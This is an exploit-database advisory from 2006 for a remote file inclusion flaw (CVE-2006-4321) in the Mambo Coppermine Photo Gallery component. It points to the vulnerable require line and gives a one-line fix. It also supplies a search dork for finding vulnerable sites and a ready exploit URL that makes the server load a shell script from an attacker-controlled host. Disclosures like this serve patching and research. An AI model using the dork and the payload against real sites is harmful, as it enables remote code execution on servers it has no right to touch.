Mambo CopperminePhotoGalery Component Remote Include Vulnerability

2006-08-16T00:00:00
ID EDB-ID:2196
Type exploitdb
Reporter k1tk4t
Modified 2006-08-16T00:00:00

Description

Mambo CopperminePhotoGalery Component Remote Include Vulnerability. CVE-2006-4321. Webapps exploit for php platform

                                        
                                            ###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote atacker to execute commands via RFI

file:
cpg.php  

bug:
require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?


thanks to

e-c-h-o
h4cky0u
milw0rm
google

# milw0rm.com [2006-08-16]